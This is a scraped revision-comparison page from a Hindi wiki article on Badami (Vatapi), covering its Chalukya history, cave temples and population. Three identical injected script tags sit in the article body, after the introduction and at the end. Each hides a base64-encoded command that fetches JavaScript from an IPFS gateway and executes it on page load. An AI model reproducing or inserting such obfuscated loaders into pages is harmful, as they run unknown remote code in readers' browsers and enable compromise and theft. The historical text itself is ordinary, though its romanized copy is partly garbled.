Difference between revisions of "बादामी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (बादामी कर्नाटक का नाम बदलकर बादामी कर दिया गया है)
Line 3: Line 3:
 
{{tocright}}
 
{{tocright}}
 
==इतिहास==
 
==इतिहास==
छठी-सातवीं शती ई. में वातापी नगरी [[चालुक्य वंश]] की राजधानी के रूप में प्रसिद्ध थी। पहली बार यहाँ 550 ई. के लगभग [[पुलकेशी प्रथम]] ने अपनी राजधानी स्थापित की थी। उसने वातापी में [[अश्वमेध यज्ञ]] सम्पन्न करके अपने वंश की सुदृढ़ नींव स्थापित की थी। 608 ई. में [[पुलकेशी द्वितीय]] वातापी के सिंहासन पर आसीन हुआ। यह बहुत प्रतापी राजा था। इसने प्रायः 20 वर्षों में [[गुजरात]], [[राजस्थान]], [[मालवा]], [[कोंकण]], [[वेंगी]] आदि प्रदेश को विजित किया। 620 ई. के आसपास [[नर्मदा नदी]] के दक्षिण में वातापी नरेश की सर्वत्र दुंदुभि बज रही थी और उसके समान यशस्वी राजा दक्षिण [[भारत]] में दूसरा नहीं था। मुसलमान इतिहास लेखक [[तबरी]] के अनुसार 625-626 ई. में ईरान के बादशाह ख़ुसरो द्वितीय ने पुलकेशियन की राज्यसभा में अपना एक दूत भेजकर उसके प्रति अपना सम्मान प्रदर्शित किया था। शायद इसी घटना का दृश्य [[अजन्ता]] के एक चित्र (गुहा संख्या 1) में अंकित किया गया है। वातापी नगरी इस समय अपनी समृद्धी के मध्याह्न काल में थी। किन्तु 642 ई. में पल्लवनरेश [[नरसिंह वर्मन]] ने पुलकेशियन को युद्ध में परास्त कर सत्ता का अन्त कर दिया। पुलकेशियन स्वंय भी इस युद्ध में आहत हुआ। वातापी को जीतकर नरसिंह वर्मन ने नगर में खूब लूटमार मचाई। [[पल्ल्व वंश|पल्लवों]] और चालुक्यों की शत्रुता इसके पश्चात भी चलती रही। 750 ई. में राष्ट्रकूटों ने वातापी तथा परिवर्ति प्रदेश पर अधिकार कर लिया। वातापी पर चालुक्यों का 200 वर्षों तक राज्य रहा। इस काल में वातापि ने बहुत उन्नति की। [[हिन्दू]], [[बौद्ध]] और [[जैन]] तीनों ही सम्पद्रायों ने अनेक मन्दिरों तथा कलाकृतियों से इस नगरी को सुशोभित किया। छठी शती के अन्त में [[मंगलेश चालुक्य]] ने वातापी में एक गुहामन्दिर बनवाया था जिसकी वास्तुकला बौद्ध गुहा मन्दिरों के जैसी है। वातापी के राष्ट्रकूट नरेशों में दंन्तिदुर्ग और कृष्ण प्रथम प्रमुख हैं। कृष्ण के समय में [[एलौरा]] का जगत प्रसिद्ध मन्दिर बना था किन्तु राष्ट्रकूटों के शासनकाल में वातापी का चालुक्यकालीन गौरव फिर न उभर सका और इसकी ख्याति धीरे-धीरे विलुप्त हो गई।
+
छठी-सातवीं शती ई. में वातापी नगरी [[चालुक्य वंश]] की राजधानी के रूप में प्रसिद्ध थी। पहली बार यहाँ 550 ई. के लगभग [[पुलकेशी प्रथम]] ने अपनी राजधानी स्थापित की थी। उसने वातापी में [[अश्वमेध यज्ञ]] सम्पन्न करके अपने वंश की सुदृढ़ नींव स्थापित की थी। 608 ई. में [[पुलकेशी द्वितीय]] वातापी के सिंहासन पर आसीन हुआ। यह बहुत प्रतापी राजा था। इसने प्रायः 20 वर्षों में [[गुजरात]], [[राजस्थान]], [[मालवा]], [[कोंकण]], [[वेंगी]] आदि प्रदेश को विजित किया। 620 ई. के आसपास [[नर्मदा नदी]] के दक्षिण में वातापी नरेश की सर्वत्र दुंदुभि बज रही थी और उसके समान यशस्वी राजा दक्षिण [[भारत]] में दूसरा नहीं था। मुसलमान इतिहास लेखक [[तबरी]] के अनुसार 625-626 ई. में ईरान के बादशाह ख़ुसरो द्वितीय ने पुलकेशियन की राज्यसभा में अपना एक दूत भेजकर उसके प्रति अपना सम्मान प्रदर्शित किया था। शायद इसी घटना का दृश्य [[अजन्ता]] के एक चित्र (गुहा संख्या 1) में अंकित किया गया है। वातापी नगरी इस समय अपनी समृद्धी के मध्याह्न काल में थी। किन्तु 642 ई. में पल्लवनरेश [[नरसिंह वर्मन]] ने पुलकेशियन को युद्ध में परास्त कर सत्ता का अन्त कर दिया। पुलकेशियन स्वंय भी इस युद्ध में आहत हुआ। वातापी को जीतकर नरसिंह वर्मन ने नगर में खूब लूटमार मचाई। [[पल्लव वंश|पल्लवों]] और चालुक्यों की शत्रुता इसके पश्चात भी चलती रही। 750 ई. में राष्ट्रकूटों ने वातापी तथा परिवर्ति प्रदेश पर अधिकार कर लिया। वातापी पर चालुक्यों का 200 वर्षों तक राज्य रहा। इस काल में वातापि ने बहुत उन्नति की। [[हिन्दू]], [[बौद्ध]] और [[जैन]] तीनों ही सम्पद्रायों ने अनेक मन्दिरों तथा कलाकृतियों से इस नगरी को सुशोभित किया। छठी शती के अन्त में [[मंगलेश|मंगलेश चालुक्य]] ने वातापी में एक गुहामन्दिर बनवाया था जिसकी वास्तुकला बौद्ध गुहा मन्दिरों के जैसी है। वातापी के राष्ट्रकूट नरेशों में दंन्तिदुर्ग और कृष्ण प्रथम प्रमुख हैं। कृष्ण के समय में [[एलोरा की गुफ़ाएं।|एलौरा]] का जगत प्रसिद्ध मन्दिर बना था किन्तु राष्ट्रकूटों के शासनकाल में वातापी का चालुक्यकालीन गौरव फिर न उभर सका और इसकी ख्याति धीरे-धीरे विलुप्त हो गई।
  
 
==दर्शनीय स्थल==
 
==दर्शनीय स्थल==

Revision as of 15:52, 4 July 2011

[[chitr:Shiva-2.jpg|thumb|220px|shiv ke mandir par naqqashi]] badami nagar uttari karnatak (bhootapoorv maisoor) rajy ke dakshin-pashchimi bharat mean hai. is nagar ko prachin samay mean vatapi ke nam se jana jata tha. aur yah chaluky rajaoan ki pahali rajadhani tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

itihas

chhathi-satavian shati ee. mean vatapi nagari chaluky vansh ki rajadhani ke roop mean prasiddh thi. pahali bar yahaan 550 ee. ke lagabhag pulakeshi pratham ne apani rajadhani sthapit ki thi. usane vatapi mean ashvamedh yajn sampann karake apane vansh ki sudridh nianv sthapit ki thi. 608 ee. mean pulakeshi dvitiy vatapi ke sianhasan par asin hua. yah bahut pratapi raja tha. isane prayah 20 varshoan mean gujarat, rajasthan, malava, koankan, veangi adi pradesh ko vijit kiya. 620 ee. ke asapas narmada nadi ke dakshin mean vatapi naresh ki sarvatr duandubhi baj rahi thi aur usake saman yashasvi raja dakshin bharat mean doosara nahian tha. musalaman itihas lekhak tabari ke anusar 625-626 ee. mean eeran ke badashah khusaro dvitiy ne pulakeshiyan ki rajyasabha mean apana ek doot bhejakar usake prati apana samman pradarshit kiya tha. shayad isi ghatana ka drishy ajanta ke ek chitr (guha sankhya 1) mean aankit kiya gaya hai. vatapi nagari is samay apani samriddhi ke madhyahn kal mean thi. kintu 642 ee. mean pallavanaresh narasianh varman ne pulakeshiyan ko yuddh mean parast kar satta ka ant kar diya. pulakeshiyan svany bhi is yuddh mean ahat hua. vatapi ko jitakar narasianh varman ne nagar mean khoob lootamar machaee. pallavoan aur chalukyoan ki shatruta isake pashchat bhi chalati rahi. 750 ee. mean rashtrakootoan ne vatapi tatha parivarti pradesh par adhikar kar liya. vatapi par chalukyoan ka 200 varshoan tak rajy raha. is kal mean vatapi ne bahut unnati ki. hindoo, bauddh aur jain tinoan hi sampadrayoan ne anek mandiroan tatha kalakritiyoan se is nagari ko sushobhit kiya. chhathi shati ke ant mean mangalesh chaluky ne vatapi mean ek guhamandir banavaya tha jisaki vastukala bauddh guha mandiroan ke jaisi hai. vatapi ke rashtrakoot nareshoan mean danntidurg aur krishna pratham pramukh haian. krishna ke samay mean elaura ka jagat prasiddh mandir bana tha kintu rashtrakootoan ke shasanakal mean vatapi ka chalukyakalin gaurav phir n ubhar saka aur isaki khyati dhire-dhire vilupt ho gee.

darshaniy sthal

yahaan chhathi aur satavian shatabdi ke brahmi evan jain gufa mandir hai. thos chattanoan ko katakar banae ge in mandiroan ki aantarik sajja vishisht hai. chaluky kal ke kee mandir bhi yahaan par sthit haian. yah apane pashan shilp kala ke mandiroan ke lie prasiddh hai.

janasankhya

2001 ki ganana ke anusar badami nagar ki janasankhya 25,851 hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>